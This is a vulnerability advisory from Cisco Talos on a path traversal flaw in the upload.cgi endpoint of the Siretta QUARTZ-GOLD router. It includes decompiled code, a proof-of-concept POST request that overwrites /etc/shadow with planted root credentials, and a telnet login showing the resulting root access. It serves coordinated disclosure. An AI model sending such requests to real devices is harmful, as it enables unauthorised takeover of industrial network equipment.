Talos Vulnerability Report


Siretta QUARTZ-GOLD httpd upload.cgi file write vulnerability

January 26, 2023
CVE Number



A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.


The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020


QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/


7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H


CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)


The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

The endpoint upload.cgi permits to upload a file. Following one of the functions responsible for this API:

void input_upload.cgi(char *path,int len,char *boundary)

  remaining_length_to_write = len;
  storage_udisk = nvram_get_int("storage_udisk");
  [... calculate base_folder and perform basic checks...]
  else {
    filename_param = (char *)webcgi_safeget("filename");                                                        [1]
    filename = "";
    if (filename_param != (char *)0x0) {
      filename = filename_param;
    sprintf(buff,"%s/%s",base_folder,filename);                                                                 [2]
    fd = fopen(buff,"w");                                                                                       [3]
    if (fd == (FILE *)0x0) {
      base_folder = "Unable to start pipe for mtd write";
    else {
      boundary_len = strlen(boundary);
      remaining_length_to_write = (remaining_length_to_write - 6) - boundary_len;
      while (0 < (int)remaining_length_to_write) {
        n_bytes_to_read = remaining_length_to_write;
        n_bytes_read = web_read(buff,n_bytes_to_read);
        remaining_length_to_write = remaining_length_to_write - n_bytes_read;
        bytes_written = safe_fwrite(buff,1,n_bytes_read,fd);                                                    [4]

This function will fetch the specified filename, at [1], and then it will use it to compose the file-path at [2]. The compose file-path is used at [3] to create/overwrite the file, and then the uploaded file will be used for the content of the just-created/overwritten file at [4]. Because from [1] up to [2] no sanitization is performed against the filename parameter, this function is vulnerable to a path traversal vulnerability. This can lead to overwriting an arbitrary file in the file-system and can lead to arbitrary command execution.

Exploit Proof of Concept

Sending a request like the following:

POST /upload.cgi?_http_id=<the correct tid>&filename=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1
Authorization: Basic <a valid basic auth value>
Content-Length: 286
Content-Type: multipart/form-data; boundary=906881afb7fae201f7f9962a229f9884

Content-Disposition: form-data; name="content"; filename="content"


If the request was successful, it is now possible to access the device using root:admin as credentials. For instance connecting, using telnet, to the port 2323 we can provide the injected credentials:

❯ telnet 2323
Connected to
Escape character is '^]'.
QUARTZ-GOLD login: root


Effectively allowing arbitrary command execution.


2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release


Discovered by Francesco Benvenuto of Cisco Talos.